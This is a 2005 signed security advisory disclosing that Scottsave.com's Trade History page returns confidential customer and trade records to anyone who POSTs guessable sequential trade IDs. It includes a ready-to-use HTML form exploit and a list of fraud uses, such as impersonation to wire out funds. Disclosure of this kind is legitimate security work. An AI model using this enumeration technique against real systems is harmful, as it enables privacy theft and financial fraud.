<<< Date Index >>>     <<< Thread Index >>>

Scottsave.com Trade History Exploit



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

*****************************************************************************
                    SCOTTSAVE.COM TRADE HISTORY EXPLOIT
*****************************************************************************
 RISK TO CUSTOMER
 Extremely High

***********
 BACKGROUND
 Scottrade, Inc. is a discount online brokerage firm with over 1.4 million
 customers. Scottrade began online trading in 1996 and has received high
 satisfaction ratings since the release of their online trading application
 called Scottrader.

********
 SUMMARY
 A serious vulnerability exists in the Trade History feature of the
 Scottsave.com website allowing an anonymous third party to gain
 confidential information about customers and their trading habits.
 The information available could be used to perform identify theft,
 fraud, and other possibly criminal actions through social engineering.

**************
 PREREQUISITES
 None

******************
 TECHNICAL DETAILS
 Scottrade provides web-based access to customer trade history
 through the Scottsave.com website which requires a valid username
 and password to access.

 All trades recorded by Scottrade are assigned an auto-incrementing
 identifier in their database.  Normally a customer browses their
 entire trade history summary and then clicks a FORM submit button
 that brings up details on individual trades.

 The page that provides trade details is:
 https://www1.scottsave.com/Scripts/Confirms.dll?DisplayPage

 On this page, the following information is displayed:
  - Scottrade Account Number
  - Account Holder Name
  - Account Holder Address (at the time of execution)
  - Trading Symbol
  - Security Description (Name of the company being traded)
  - Trade Number
  - Account Type (Broker Dealer, Cash, Margin, Short, etc)
  - Market of Execution (Over-the-Counter, NYSE, Nasdaq, etc)
  - Capacity in which Scottrade acted
  - Account Instructions (Hold Funds in Account, Mail Security, etc)
  - Trade Date
  - Settlement Date
  - Office Code
  - Action (Buy or Sell)
  - Quantity (# of shares traded)
  - CUSIP Number
  - Coupon Maturity
  - Price
  - Principal
  - Commission Paid
  - State Tax / Interest
  - SEC Fee
  - Trans Fee
  - Misc Fees
  - Interest
  - Net Amount
  - Additional Information (Text field used to specify any additional info)

 This information can be retrieved by performing an HTTP POST to:
   https://www1.scottsave.com/Scripts/Confirms.dll?Summary?OPTIMIZED=
 The only field required during this post is named "ID1234567" and the
 value is the string "Details" where 1234567 is an ID number used to
 identify your trade.

 Because the ID number appears to be an auto-incrementing value, one can
 easily guess an entire range of valid trade numbers. One can systematically
 retrieve records from all trades made, collecting the above information
 about each customer.

 Someone with malicious intent could possible use the obtained info to:
  - Gain detailed trading habit analysis of individual customers
  - Gain private personal information about Scottrade customers
  - Impersonate Scottrade customers and possibly be able to socially engineer
    the wiring of money from the account into a private bank account of
    another
  - Enumerate valid Account Numbers for use in the Scottrader Applet exploit
  - And many other possible things...

****************
 EXAMPLE EXPLOIT
 The exploit is extremely simple to execute for even an inexperienced user.
 To use this exploit, simply create an html file containing the following.


<html><head></head>
<base
href="https://www1.scottsave.com/Scripts/Confirms.dll?Summary?OPTIMIZED=";>
<body>
<form action="Confirms.dll?DisplayPage" method="post"
name="frmHeader">
<input type="submit" value="Details" name="ID1234567">
</form></body></html>


*******
 STATUS
 Scottrade was contacted January 3rd, 2005.  Scottrade was provided
 vulnerability details the evening of January 24th, 2005.

 A coordinated disclosure would have been ideal, but Scottrade has
 ignored all communications from me since January 24th.  I believe
 enough time has elapsed that the security holes reported have now
 been corrected.

 For more information, contact Scottrade at (800) 619-7283.

**************
 PERSONAL RANT
 As a previously happy customer of Scottrade, I am also a victim
 to the issues discussed.  I am not satisfied with Scottrade's
 response (actually, a lack thereof) when attempting to report
 the issue and hope that making it public will ensure that
 it is properly addressed and the timely notifications are sent
 to customers affected.

******************
 LEGAL INFORMATION
 The information provided is subject to change at any time without
 notification.  This information is believed to be correct.
 The reporter of this issue shall not be held liable for any
 downtime, lost profits, or damages due to this report
 or the issues contained within it.

*****************************************************************************
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFCBb77LQa1lBNB5R0RAkCNAJ99GRc+OQbeoz2Kh6SqR+ALyQ1JDQCfbcN0
wgQRt42yBq+6qXq15XnpsQw=
=jKkS
-----END PGP SIGNATURE-----